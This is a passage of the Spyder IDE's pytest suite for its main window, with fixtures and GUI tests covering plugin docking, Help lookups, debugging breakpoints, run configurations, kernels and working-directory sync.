'snippets': snippets,
'lsp': lsp
}
}
# Add the fake distribution to the global working_set
pkg_resources.working_set.add(d, 'spyder')
def remove_fake_entrypoints():
"""Remove fake entry points from pkg_resources"""
try:
pkg_resources.working_set.by_key.pop('unknown')
pkg_resources.working_set.entry_keys.pop('spyder')
pkg_resources.working_set.entry_keys.pop(__file__)
pkg_resources.working_set.entries.remove('spyder')
except KeyError:
pass
def read_asset_file(filename):
"""Read contents of an asset file."""
return encoding.read(osp.join(LOCATION, filename))[0]
# =============================================================================
# ---- Fixtures
# =============================================================================
@pytest.fixture
def main_window(request, tmpdir, qtbot):
"""Main Window fixture"""
if not running_in_ci():
register_fake_entrypoints()
# Tests assume inline backend
CONF.set('ipython_console', 'pylab/backend', 0)
# Test assume the plots are rendered in the console as png
CONF.set('plots', 'mute_inline_plotting', False)
CONF.set('ipython_console', 'pylab/inline/figure_format', 0)
# Set exclamation mark to True
CONF.set('ipython_console', 'pdb_use_exclamation_mark', True)
# Check if we need to use introspection in a given test
# (it's faster and less memory consuming not to use it!)
use_introspection = request.node.get_closest_marker('use_introspection')
if use_introspection:
os.environ['SPY_TEST_USE_INTROSPECTION'] = 'True'
else:
try:
os.environ.pop('SPY_TEST_USE_INTROSPECTION')
except KeyError:
pass
# Only use single_instance mode for tests that require it
single_instance = request.node.get_closest_marker('single_instance')
if single_instance:
CONF.set('main', 'single_instance', True)
else:
CONF.set('main', 'single_instance', False)
# Check if we need to load a simple project to the interface
preload_project = request.node.get_closest_marker('preload_project')
if preload_project:
# Create project directory
project = tmpdir.mkdir('test_project')
project_path = str(project)
# Create Spyder project
spy_project = EmptyProject(project_path)
CONF.set('project_explorer', 'current_project_path', project_path)
# Add a file to the project
file = project.join('file.py')
file.write(read_asset_file('script_outline_1.py'))
spy_project.set_recent_files([str(file)])
else:
CONF.set('project_explorer', 'current_project_path', None)
# Check if we need to preload a complex project in a give test
preload_complex_project = request.node.get_closest_marker(
'preload_complex_project')
if preload_complex_project:
# Create project
project = tmpdir.mkdir('test_project')
project_subdir = project.mkdir('subdir')
project_sub_subdir = project_subdir.mkdir('sub_subdir')
# Create directories out of the project
out_of_project_1 = tmpdir.mkdir('out_of_project_1')
out_of_project_2 = tmpdir.mkdir('out_of_project_2')
out_of_project_1_subdir = out_of_project_1.mkdir('subdir')
out_of_project_2_subdir = out_of_project_2.mkdir('subdir')
project_path = str(project)
spy_project = EmptyProject(project_path)
CONF.set('project_explorer', 'current_project_path', project_path)
# Add some files to project. This is necessary to test that we get
# symbols for all these files.
abs_filenames = []
filenames_to_create = {
project: ['file1.py', 'file2.py', 'file3.txt', '__init__.py'],
project_subdir: ['a.py', '__init__.py'],
project_sub_subdir: ['b.py', '__init__.py'],
out_of_project_1: ['c.py'],
out_of_project_2: ['d.py', '__init__.py'],
out_of_project_1_subdir: ['e.py', '__init__.py'],
out_of_project_2_subdir: ['f.py']
}
for path in filenames_to_create.keys():
filenames = filenames_to_create[path]
for filename in filenames:
file = path.join(filename)
abs_filenames.append(str(file))
if osp.splitext(filename)[1] == '.py':
if path == project_subdir:
code = read_asset_file('script_outline_2.py')
elif path == project_sub_subdir:
code = read_asset_file('script_outline_3.py')
else:
code = read_asset_file('script_outline_1.py')
file.write(code)
else:
file.write("Hello world!")
spy_project.set_recent_files(abs_filenames)
else:
if not preload_project:
CONF.set('project_explorer', 'current_project_path', None)
# Get config values passed in parametrize and apply them
try:
param = request.param
if isinstance(param, dict) and 'spy_config' in param:
CONF.set(*param['spy_config'])
except AttributeError:
pass
if not hasattr(main_window, 'window'):
from spyder.api.plugin_registration.registry import PLUGIN_REGISTRY
PLUGIN_REGISTRY.reset()
# Start the window
window = start.main()
main_window.window = window
else:
window = main_window.window
# Remove Kite (In case it was registered via setup.py)
window.completions.providers.pop('kite', None)
# Wait until console is up
shell = window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
if os.name != 'nt':
# _DummyThread are created if current_thread() is called from them.
# They will always leak (From python doc) so we ignore them.
init_threads = [
repr(thread) for thread in threading.enumerate()
if not isinstance(thread, threading._DummyThread)]
proc = psutil.Process()
init_files = [repr(f) for f in proc.open_files()]
init_subprocesses = [repr(f) for f in proc.children()]
yield window
# Print shell content if failed
if request.node.rep_setup.passed:
if request.node.rep_call.failed:
# Print content of shellwidget and close window
print(window.ipyconsole.get_current_shellwidget(
)._control.toPlainText())
# Print info page content is not blank
console = window.ipyconsole
client = console.get_current_client()
if client.info_page != client.blank_page:
print('info_page')
print(client.info_page)
window.close()
del main_window.window
else:
# Close everything we can think of
window.editor.close_file()
window.projects.close_project()
if window.console.error_dialog:
window.console.close_error_dialog()
window.switcher.close()
for client in window.ipyconsole.get_clients():
window.ipyconsole.close_client(client=client, ask_recursive=False)
window.outlineexplorer.stop_symbol_services('python')
# Reset cwd
window.explorer.chdir(get_home_dir())
# Unregister boilerplate plugin
spyder_boilerplate = window.get_plugin(
'spyder_boilerplate', error=False)
if spyder_boilerplate is not None:
window.unregister_plugin(spyder_boilerplate)
if os.name == 'nt':
# Do not test leaks on windows
return
known_leak = request.node.get_closest_marker(
'known_leak')
if known_leak:
# This test has a known leak
return
def show_diff(init_list, now_list, name):
sys.stderr.write(f"Extra {name} before test:\n")
for item in init_list:
if item in now_list:
now_list.remove(item)
else:
sys.stderr.write(item + "\n")
sys.stderr.write(f"Extra {name} after test:\n")
for item in now_list:
sys.stderr.write(item + "\n")
# The test is not allowed to open new files or threads.
try:
def threads_condition():
threads = [
thread for thread in threading.enumerate()
if not isinstance(thread, threading._DummyThread)]
return (len(init_threads) >= len(threads))
qtbot.waitUntil(threads_condition, timeout=SHELL_TIMEOUT)
except Exception:
now_threads = [
thread for thread in threading.enumerate()
if not isinstance(thread, threading._DummyThread)]
threads = [repr(t) for t in now_threads]
show_diff(init_threads, threads, "thread")
sys.stderr.write("Running Threads stacks:\n")
now_thread_ids = [t.ident for t in now_threads]
for threadId, frame in sys._current_frames().items():
if threadId in now_thread_ids:
sys.stderr.write("\nThread " + str(threads) + ":\n")
traceback.print_stack(frame)
raise
try:
qtbot.waitUntil(lambda: (
len(init_subprocesses) >= len(proc.children())),
timeout=SHELL_TIMEOUT)
except Exception:
subprocesses = [repr(f) for f in proc.children()]
show_diff(init_subprocesses, subprocesses, "processes")
raise
try:
qtbot.waitUntil(
lambda: (len(init_files) >= len(proc.open_files())),
timeout=SHELL_TIMEOUT)
except Exception:
files = [repr(f) for f in proc.open_files()]
show_diff(init_files, files, "files")
raise
@pytest.fixture(scope="session", autouse=True)
def cleanup(request):
"""Cleanup a testing directory once we are finished."""
def close_window():
if hasattr(main_window, 'window'):
try:
main_window.window.close()
except AttributeError:
pass
# Also clean entry points if running locally.
if not running_in_ci():
remove_fake_entrypoints()
request.addfinalizer(close_window)
# =============================================================================
# ---- Tests
# =============================================================================
@pytest.mark.slow
@pytest.mark.order(1)
@pytest.mark.single_instance
@pytest.mark.skipif(
not running_in_ci(), reason="It's not meant to be run outside of CIs")
def test_single_instance_and_edit_magic(main_window, qtbot, tmpdir):
"""Test single instance mode and %edit magic."""
editorstack = main_window.editor.get_current_editorstack()
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(
lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
spy_dir = osp.dirname(get_module_path('spyder'))
lock_code = (
"import sys\n"
"sys.path.append(r'{spy_dir_str}')\n"
"from spyder.utils.external import lockfile\n"
"lock_file = r'{lock_file}'\n"
"lock = lockfile.FilesystemLock(lock_file)\n"
"lock_created = lock.lock()\n"
"print(lock_created)".format(
spy_dir_str=spy_dir,
lock_file=get_conf_path('spyder.lock'))
)
with qtbot.waitSignal(shell.executed, timeout=2000):
shell.execute(lock_code)
qtbot.wait(1000)
assert not shell.get_value('lock_created')
# Test %edit magic
n_editors = editorstack.get_stack_count()
p = tmpdir.mkdir("foo").join("bar.py")
p.write(lock_code)
with qtbot.waitSignal(shell.executed):
shell.execute('%edit {}'.format(to_text_string(p)))
qtbot.wait(3000)
assert editorstack.get_stack_count() == n_editors + 1
assert editorstack.get_current_editor().toPlainText() == lock_code
main_window.editor.close_file()
@pytest.mark.slow
def test_lock_action(main_window):
"""Test the lock interface action."""
action = main_window.layouts.lock_interface_action
plugins = main_window.widgetlist
# By default the interface is locked.
assert main_window.layouts._interface_locked
# In this state the title bar is an empty QWidget
for plugin in plugins:
title_bar = plugin.dockwidget.titleBarWidget()
assert not isinstance(title_bar, DockTitleBar)
assert isinstance(title_bar, QWidget)
# Test that our custom title bar is shown when the action
# is triggered.
action.trigger()
for plugin in plugins:
title_bar = plugin.dockwidget.titleBarWidget()
assert isinstance(title_bar, DockTitleBar)
assert not main_window.layouts._interface_locked
# Restore default state
action.trigger()
assert main_window.layouts._interface_locked
@pytest.mark.slow
@pytest.mark.order(1)
@pytest.mark.skipif(sys.platform.startswith('linux') and not running_in_ci(),
reason='Fails on Linux when run locally')
def test_default_plugin_actions(main_window, qtbot):
"""Test the effect of dock, undock, close and toggle view actions."""
# Use a particular plugin
file_explorer = main_window.explorer
main_widget = file_explorer.get_widget()
# Undock action
main_widget.undock_action.triggered.emit(True)
qtbot.wait(500)
main_widget.windowwidget.move(200, 200)
assert not file_explorer.dockwidget.isVisible()
assert main_widget.undock_action is not None
assert isinstance(main_widget.windowwidget, SpyderWindowWidget)
assert main_widget.windowwidget.centralWidget() == main_widget
# Dock action
main_widget.dock_action.triggered.emit(True)
qtbot.wait(500)
assert file_explorer.dockwidget.isVisible()
assert main_widget.windowwidget is None
# Test geometry was saved on close
geometry = file_explorer.get_conf('window_geometry')
assert geometry != ''
# Test restoring undocked plugin with the right geometry
file_explorer.set_conf('undocked_on_window_close', True)
main_window.restore_undocked_plugins()
assert main_widget.windowwidget is not None
assert (
geometry == qbytearray_to_str(main_widget.windowwidget.saveGeometry())
)
main_widget.windowwidget.close()
# Close action
main_widget.close_action.triggered.emit(True)
qtbot.wait(500)
assert not file_explorer.dockwidget.isVisible()
assert not file_explorer.toggle_view_action.isChecked()
# Toggle view action
file_explorer.toggle_view_action.setChecked(True)
assert file_explorer.dockwidget.isVisible()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.parametrize('main_window', [{'spy_config': ('main', 'opengl', 'software')}], indirect=True)
def test_opengl_implementation(main_window, qtbot):
"""
Test that we are setting the selected OpenGL implementation
"""
assert main_window._test_setting_opengl('software')
# Restore default config value
CONF.set('main', 'opengl', 'automatic')
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(
np.__version__ < '1.14.0' or (os.name == 'nt' and PY2),
reason="This only happens in Numpy 1.14+"
)
@pytest.mark.parametrize('main_window', [{'spy_config': ('variable_explorer', 'minmax', True)}], indirect=True)
def test_filter_numpy_warning(main_window, qtbot):
"""
Test that we filter a warning shown when an array contains nan
values and the Variable Explorer option 'Show arrays min/man'
is on.
For spyder-ide/spyder#7063.
"""
shell = main_window.ipyconsole.get_current_shellwidget()
control = shell._control
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Create an array with a nan value
with qtbot.waitSignal(shell.executed):
shell.execute('import numpy as np; A=np.full(16, np.nan)')
qtbot.wait(1000)
# Assert that no warnings are shown in the console
assert "warning" not in control.toPlainText()
assert "Warning" not in control.toPlainText()
# Restore default config value
CONF.set('variable_explorer', 'minmax', False)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(PY2 or not sys.platform == 'darwin',
reason="Times out in PY2 and fails on other than macOS")
@pytest.mark.known_leak # Opens Spyder/QtWebEngine/Default/Cookies
def test_get_help_combo(main_window, qtbot):
"""
Test that Help can display docstrings for names typed in its combobox.
"""
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
help_plugin = main_window.help
webview = help_plugin.get_widget().rich_text.webview._webview
if WEBENGINE:
webpage = webview.page()
else:
webpage = webview.page().mainFrame()
# --- From the console ---
# Write some object in the console
with qtbot.waitSignal(shell.executed):
shell.execute('import numpy as np')
# Get help - numpy
object_combo = help_plugin.get_widget().object_combo
object_combo.setFocus()
qtbot.keyClicks(object_combo, 'numpy', delay=100)
# Check that a expected text is part of the page
qtbot.waitUntil(lambda: check_text(webpage, "NumPy"), timeout=6000)
# Get help - numpy.arange
qtbot.keyClicks(object_combo, '.arange', delay=100)
# Check that a expected text is part of the page
qtbot.waitUntil(lambda: check_text(webpage, "arange"), timeout=6000)
# Get help - np
# Clear combo
object_combo.set_current_text('')
qtbot.keyClicks(object_combo, 'np', delay=100)
# Check that a expected text is part of the page
qtbot.waitUntil(lambda: check_text(webpage, "NumPy"), timeout=6000)
# Get help - np.arange
qtbot.keyClicks(object_combo, '.arange', delay=100)
# Check that a expected text is part of the page
qtbot.waitUntil(lambda: check_text(webpage, "arange"), timeout=6000)
@pytest.mark.slow
@pytest.mark.skipif(PY2, reason="Invalid definition of function in Python 2.")
@pytest.mark.known_leak # Opens Spyder/QtWebEngine/Default/Cookies
def test_get_help_ipython_console_dot_notation(main_window, qtbot, tmpdir):
"""
Test that Help works when called from the IPython console
with dot calls i.e np.sin
See spyder-ide/spyder#11821
"""
shell = main_window.ipyconsole.get_current_shellwidget()
control = shell._control
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Open test file
test_file = osp.join(LOCATION, 'script_unicode.py')
main_window.editor.load(test_file)
code_editor = main_window.editor.get_focus_widget()
# Run test file
qtbot.keyClick(code_editor, Qt.Key_F5)
qtbot.wait(500)
help_plugin = main_window.help
webview = help_plugin.get_widget().rich_text.webview._webview
webpage = webview.page() if WEBENGINE else webview.page().mainFrame()
# Write function name
qtbot.keyClicks(control, u'np.linalg.norm')
# Get help
control.inspect_current_object()
# Check that a expected text is part of the page
qtbot.waitUntil(
lambda: check_text(webpage, "Matrix or vector norm."),
timeout=6000)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform == 'darwin', reason="Too flaky on Mac")
def test_get_help_ipython_console_special_characters(
main_window, qtbot, tmpdir):
"""
Test that Help works when called from the IPython console
for unusual characters.
See spyder-ide/spyder#7699
"""
shell = main_window.ipyconsole.get_current_shellwidget()
control = shell._control
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Open test file
test_file = osp.join(LOCATION, 'script_unicode.py')
main_window.editor.load(test_file)
code_editor = main_window.editor.get_focus_widget()
# Run test file
qtbot.keyClick(code_editor, Qt.Key_F5)
qtbot.wait(500)
help_plugin = main_window.help
webview = help_plugin.get_widget().rich_text.webview._webview
webpage = webview.page() if WEBENGINE else webview.page().mainFrame()
# Write function name and assert in Console
def check_control(control, value):
return value in control.toPlainText()
qtbot.keyClicks(control, u'aa\t')
qtbot.waitUntil(lambda: check_control(control, u'aaʹbb'), timeout=2000)
# Get help
control.inspect_current_object()
# Check that a expected text is part of the page
qtbot.waitUntil(lambda: check_text(webpage, "This function docstring."),
timeout=6000)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt' and running_in_ci(),
reason="Times out on Windows")
def test_get_help_ipython_console(main_window, qtbot):
"""Test that Help works when called from the IPython console."""
shell = main_window.ipyconsole.get_current_shellwidget()
control = shell._control
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
help_plugin = main_window.help
webview = help_plugin.get_widget().rich_text.webview._webview
webpage = webview.page() if WEBENGINE else webview.page().mainFrame()
# Write some object in the console
qtbot.keyClicks(control, 'runfile')
# Get help
control.inspect_current_object()
# Check that a expected text is part of the page
qtbot.waitUntil(lambda: check_text(webpage, "namespace"), timeout=6000)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(not sys.platform.startswith('linux'),
reason="Does not work on Mac and Windows!")
@pytest.mark.use_introspection
@pytest.mark.parametrize(
"object_info",
[("range", "range"),
("import numpy as np", "An array object of arbitrary homogeneous items")])
def test_get_help_editor(main_window, qtbot, object_info):
"""Test that Help works when called from the Editor."""
help_plugin = main_window.help
webview = help_plugin.get_widget().rich_text.webview._webview
webpage = webview.page() if WEBENGINE else webview.page().mainFrame()
main_window.editor.new(fname="test.py", text="")
code_editor = main_window.editor.get_focus_widget()
editorstack = main_window.editor.get_current_editorstack()
with qtbot.waitSignal(code_editor.completions_response_signal, timeout=30000):
code_editor.document_did_open()
# Write some object in the editor
object_name, expected_text = object_info
code_editor.set_text(object_name)
code_editor.move_cursor(len(object_name))
with qtbot.waitSignal(code_editor.completions_response_signal, timeout=30000):
code_editor.document_did_change()
# Get help
with qtbot.waitSignal(code_editor.sig_display_object_info, timeout=30000):
editorstack.inspect_current_object()
# Check that a expected text is part of the page
qtbot.waitUntil(lambda: check_text(webpage, expected_text), timeout=30000)
@pytest.mark.slow
def test_window_title(main_window, tmpdir):
"""Test window title with non-ascii characters."""
projects = main_window.projects
# Create a project in non-ascii path
path = to_text_string(tmpdir.mkdir(u'測試'))
projects.open_project(path=path)
# Set non-ascii window title
main_window.window_title = u'اختبار'
# Assert window title is computed without errors
# and has the expected strings
main_window.set_window_title()
title = main_window.base_title
assert u'Spyder' in title
assert u'Python' in title
assert u'اختبار' in title
assert u'測試' in title
projects.close_project()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(not sys.platform.startswith('linux'),
reason="Fails sometimes on Windows and Mac")
@pytest.mark.parametrize("debugcell", [True, False])
def test_move_to_first_breakpoint(main_window, qtbot, debugcell):
"""Test that we move to the first breakpoint if there's one present."""
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
# Main variables
control = shell._control
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# Load test file
test_file = osp.join(LOCATION, 'script.py')
main_window.editor.load(test_file)
code_editor = main_window.editor.get_focus_widget()
# Set breakpoint
code_editor.debugger.toogle_breakpoint(line_number=10)
qtbot.wait(500)
cursor = code_editor.textCursor()
cursor.setPosition(0)
code_editor.setTextCursor(cursor)
if debugcell:
# Advance 2 cells
for i in range(2):
qtbot.keyClick(code_editor, Qt.Key_Return,
modifier=Qt.ShiftModifier)
qtbot.wait(500)
# Debug the cell
with qtbot.waitSignal(shell.executed):
qtbot.keyClick(code_editor, Qt.Key_Return,
modifier=Qt.AltModifier | Qt.ShiftModifier)
# Make sure everything is ready
assert shell.spyder_kernel_comm.is_open()
assert shell.is_waiting_pdb_input()
with qtbot.waitSignal(shell.executed):
shell.pdb_execute('!b')
assert 'script.py:10' in shell._control.toPlainText()
# We need to press continue as we don't test yet if a breakpoint
# is in the cell
with qtbot.waitSignal(shell.executed):
shell.pdb_execute('!c')
else:
# Click the debug button
with qtbot.waitSignal(shell.executed):
qtbot.mouseClick(debug_button, Qt.LeftButton)
# Verify that we are at first breakpoint
shell.clear_console()
qtbot.wait(500)
with qtbot.waitSignal(shell.executed):
shell.pdb_execute("!list")
assert "1--> 10 arr = np.array(li)" in control.toPlainText()
# Exit debugging
with qtbot.waitSignal(shell.executed):
shell.pdb_execute("!exit")
# Set breakpoint on first line with code
code_editor.debugger.toogle_breakpoint(line_number=2)
# Click the debug button
with qtbot.waitSignal(shell.executed):
qtbot.mouseClick(debug_button, Qt.LeftButton)
# Wait until continue and stop on the breakpoint
qtbot.waitUntil(lambda: "IPdb [2]:" in control.toPlainText())
# Verify that we are still on debugging
assert shell.is_waiting_pdb_input()
# Remove breakpoint and close test file
main_window.editor.clear_all_breakpoints()
main_window.editor.close_file()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason='Fails on windows!')
def test_runconfig_workdir(main_window, qtbot, tmpdir):
"""Test runconfig workdir options."""
from spyder.plugins.run.widgets import RunConfiguration
CONF.set('run', 'configurations', [])
# ---- Load test file ----
test_file = osp.join(LOCATION, 'script.py')
main_window.editor.load(test_file)
code_editor = main_window.editor.get_focus_widget()
# --- Use cwd for this file ---
rc = RunConfiguration().get()
rc['file_dir'] = False
rc['cw_dir'] = True
config_entry = (test_file, rc)
CONF.set('run', 'configurations', [config_entry])
# --- Run test file ---
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
qtbot.keyClick(code_editor, Qt.Key_F5)
qtbot.wait(500)
# --- Assert we're in cwd after execution ---
with qtbot.waitSignal(shell.executed):
shell.execute('import os; current_dir = os.getcwd()')
assert shell.get_value('current_dir') == get_home_dir()
# --- Use fixed execution dir for test file ---
temp_dir = str(tmpdir.mkdir("test_dir"))
rc['file_dir'] = False
rc['cw_dir'] = False
rc['fixed_dir'] = True
rc['dir'] = temp_dir
config_entry = (test_file, rc)
CONF.set('run', 'configurations', [config_entry])
# --- Run test file ---
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
qtbot.keyClick(code_editor, Qt.Key_F5)
qtbot.wait(500)
# --- Assert we're in fixed dir after execution ---
with qtbot.waitSignal(shell.executed):
shell.execute('import os; current_dir = os.getcwd()')
assert shell.get_value('current_dir') == temp_dir
# ---- Closing test file and resetting config ----
main_window.editor.close_file()
CONF.set('run', 'configurations', [])
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt' or sys.platform == 'darwin',
reason="It's failing there")
def test_dedicated_consoles(main_window, qtbot):
"""Test running code in dedicated consoles."""
from spyder.plugins.run.widgets import RunConfiguration
# ---- Load test file ----
test_file = osp.join(LOCATION, 'script.py')
main_window.editor.load(test_file)
code_editor = main_window.editor.get_focus_widget()
# --- Set run options for this file ---
rc = RunConfiguration().get()
# A dedicated console is used when these two options are False
rc['current'] = rc['systerm'] = False
config_entry = (test_file, rc)
CONF.set('run', 'configurations', [config_entry])
# --- Run test file and assert that we get a dedicated console ---
qtbot.keyClick(code_editor, Qt.Key_F5)
qtbot.wait(500)
shell = main_window.ipyconsole.get_current_shellwidget()
control = shell._control
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
nsb = main_window.variableexplorer.current_widget()
assert len(main_window.ipyconsole.get_clients()) == 2
assert main_window.ipyconsole.get_widget().filenames == ['', test_file]
assert main_window.ipyconsole.get_widget().tabwidget.tabText(1) == 'script.py/A'
qtbot.wait(500)
assert nsb.editor.source_model.rowCount() == 4
# --- Assert only runfile text is present and there's no banner text ---
# See spyder-ide/spyder#5301.
text = control.toPlainText()
assert ('runfile' in text) and not ('Python' in text or 'IPython' in text)
# --- Clean namespace after re-execution ---
with qtbot.waitSignal(shell.executed):
shell.execute('zz = -1')
qtbot.keyClick(code_editor, Qt.Key_F5)
qtbot.wait(500)
assert not shell.is_defined('zz')
# --- Assert runfile text is present after reruns ---
assert 'runfile' in control.toPlainText()
# ---- Closing test file and resetting config ----
main_window.editor.close_file()
CONF.set('run', 'configurations', [])
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform.startswith('linux'),
reason="Fails frequently on Linux")
def test_connection_to_external_kernel(main_window, qtbot):
"""Test that only Spyder kernels are connected to the Variable Explorer."""
# Test with a generic kernel
km, kc = start_new_kernel()
main_window.ipyconsole.get_widget()._create_client_for_kernel(
kc.connection_file, None, None, None)
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
with qtbot.waitSignal(shell.executed):
shell.execute('a = 10')
# Assert that there are no variables in the variable explorer
main_window.variableexplorer.change_visibility(True)
nsb = main_window.variableexplorer.current_widget()
qtbot.wait(500)
assert nsb.editor.source_model.rowCount() == 0
python_shell = shell
# Test with a kernel from Spyder
spykm, spykc = start_new_kernel(spykernel=True)
main_window.ipyconsole.get_widget()._create_client_for_kernel(
spykc.connection_file, None, None, None)
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
with qtbot.waitSignal(shell.executed):
shell.execute('a = 10')
# Assert that a variable is visible in the variable explorer
main_window.variableexplorer.change_visibility(True)
nsb = main_window.variableexplorer.current_widget()
qtbot.wait(500)
assert nsb.editor.source_model.rowCount() == 1
# Test runfile in external_kernel
run_action = main_window.run_toolbar_actions[0]
run_button = main_window.run_toolbar.widgetForAction(run_action)
# create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text(
"print(2 + 1)"
)
# Start running
with qtbot.waitSignal(shell.executed):
qtbot.mouseClick(run_button, Qt.LeftButton)
assert "runfile" in shell._control.toPlainText()
assert "3" in shell._control.toPlainText()
# Try quitting the kernels
shell.execute('quit()')
python_shell.execute('quit()')
qtbot.wait(1000)
# Make sure everything quit properly
assert not km.is_alive()
assert not spykm.is_alive()
# Close the channels
spykc.stop_channels()
kc.stop_channels()
@pytest.mark.order(1)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason="It times out sometimes on Windows")
def test_change_types_in_varexp(main_window, qtbot):
"""Test that variable types can't be changed in the Variable Explorer."""
# Create object
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
with qtbot.waitSignal(shell.executed):
shell.execute('a = 10')
# Edit object
main_window.variableexplorer.change_visibility(True)
nsb = main_window.variableexplorer.current_widget()
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() > 0, timeout=EVAL_TIMEOUT)
nsb.editor.setFocus()
nsb.editor.edit_item()
# Try to change types
qtbot.keyClicks(QApplication.focusWidget(), "'s'")
qtbot.keyClick(QApplication.focusWidget(), Qt.Key_Enter)
qtbot.wait(1000)
# Assert object remains the same
assert shell.get_value('a') == 10
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.parametrize("test_directory", [u"non_ascii_ñ_í_ç", u"test_dir"])
@pytest.mark.skipif(sys.platform == 'darwin', reason="It fails on macOS")
def test_change_cwd_ipython_console(
main_window, qtbot, tmpdir, test_directory):
"""
Test synchronization with working directory and File Explorer when
changing cwd in the IPython console.
"""
wdir = main_window.workingdirectory
treewidget = main_window.explorer.get_widget().treewidget
shell = main_window.ipyconsole.get_current_shellwidget()
# Wait until the window is fully up
qtbot.waitUntil(
lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
# Create temp dir
temp_dir = str(tmpdir.mkdir(test_directory))
# Change directory in IPython console using %cd
with qtbot.waitSignal(shell.executed):
shell.execute(u"%cd {}".format(temp_dir))
qtbot.wait(1000)
# Assert that cwd changed in workingdirectory
assert osp.normpath(wdir.get_container().history[-1]) == osp.normpath(
temp_dir)
# Assert that cwd changed in explorer
assert osp.normpath(treewidget.get_current_folder()) == osp.normpath(
temp_dir)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.parametrize("test_directory", [u"non_ascii_ñ_í_ç", u"test_dir"])
@pytest.mark.skipif(sys.platform == 'darwin', reason="It fails on macOS")
def test_change_cwd_explorer(main_window, qtbot, tmpdir, test_directory):
"""
Test synchronization with working directory and IPython console when
changing directories in the File Explorer.
"""
wdir = main_window.workingdirectory
explorer = main_window.explorer
shell = main_window.ipyconsole.get_current_shellwidget()
# Wait until the window is fully up
qtbot.waitUntil(
lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
# Create temp directory
temp_dir = to_text_string(tmpdir.mkdir(test_directory))
# Change directory in the explorer widget
explorer.chdir(temp_dir)
qtbot.wait(1000)
# Assert that cwd changed in workingdirectory
assert osp.normpath(wdir.get_container().history[-1]) == osp.normpath(
temp_dir)
# Assert that cwd changed in IPython console
assert osp.normpath(temp_dir) == osp.normpath(shell._cwd)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(
(os.name == 'nt' or sys.platform == 'darwin' or
parse_version(ipy_release.version) == parse_version('7.11.0')),
reason="Hard to test on Windows and macOS and fails for IPython 7.11.0")
def test_run_cython_code(main_window, qtbot):
"""Test all the different ways we have to run Cython code"""
# ---- Setup ----
# Get a reference to the code editor widget
code_editor = main_window.editor.get_focus_widget()
# ---- Run pyx file ----
# Load test file
main_window.editor.load(osp.join(LOCATION, 'pyx_script.pyx'))
# Run file
qtbot.keyClick(code_editor, Qt.Key_F5)
# Get a reference to the namespace browser widget
nsb = main_window.variableexplorer.current_widget()
# Wait until an object appears
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 1,
timeout=COMPILE_AND_EVAL_TIMEOUT)
# Verify result
shell = main_window.ipyconsole.get_current_shellwidget()
assert shell.get_value('a') == 3628800
# Reset and close file
reset_run_code(qtbot, shell, code_editor, nsb)
main_window.editor.close_file()
# ---- Import pyx file ----
# Load test file
main_window.editor.load(osp.join(LOCATION, 'pyx_lib_import.py'))
# Run file
qtbot.keyClick(code_editor, Qt.Key_F5)
# Wait until all objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 1,
timeout=COMPILE_AND_EVAL_TIMEOUT)
# Verify result
assert shell.get_value('b') == 3628800
# Close file
main_window.editor.close_file()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason="It fails on Windows.")
def test_open_notebooks_from_project_explorer(main_window, qtbot, tmpdir):
"""Test that notebooks are open from the Project explorer."""
projects = main_window.projects
projects.toggle_view_action.setChecked(True)
editorstack = main_window.editor.get_current_editorstack()
# Create a temp project directory
